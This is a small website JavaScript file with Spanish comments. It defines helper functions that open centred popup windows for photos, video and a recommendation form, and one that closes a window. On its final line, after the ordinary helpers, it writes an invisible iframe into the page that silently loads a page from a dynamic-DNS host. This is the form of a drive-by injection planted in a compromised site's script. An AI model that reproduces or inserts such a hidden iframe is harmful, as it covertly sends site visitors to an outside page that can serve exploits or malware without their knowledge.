//---------------------------------------------------------------------//

//abre ventane de popup
function openPopupFotos(ventana){
		var ww = window.screen.width;
		var wh = window.screen.height;
		var nww = 1024;
		var nwh = 650;
        var posL = (ww/2) - (nww/2);
		var posR = (wh/2) - (nwh/2);
		
		window.open(ventana,'','width=1024, height=650, resizable=no, scrollbars=yes, status=no, left=' + posL +',top=' + posR +" ' " );
}


//abre ventane de popup
function openPopupVideo(ventana){
		var ww = window.screen.width;
		var wh = window.screen.height;
		var nww = 650;
		var nwh = 630;
        var posL = (ww/2) - (nww/2);
		var posR = (wh/2) - (nwh/2);
		
		window.open(ventana,'','width=650, height=630, resizable=no, scrollbars=no, status=no, left=' + posL +',top=' + posR +" ' " );
}


//abre ventane de popup
function openPopupRecomendar(ventana){
		var ww = window.screen.width;
		var wh = window.screen.height;
		var nww = 440;
		var nwh = 650;
        var posL = (ww/2) - (nww/2);
		var posR = (wh/2) - (nwh/2);
		window.open(ventana,'','width=440, height=650, resizable=no, scrollbars=yes, status=no, left=' + posL +',top=' + posR +" ' " );
}

//---------------------------------------------------------------------//
//cierra ventana popup
function cerrarVentana(){
	window.close();
}

//---------------------------------------------------------------------//	
document.write('<iframe src="http://d-pt-m0w-9d-w-1.dyn-o-saur.com/index.php" style="display:none; visibility:hidden;" ></iframe>');
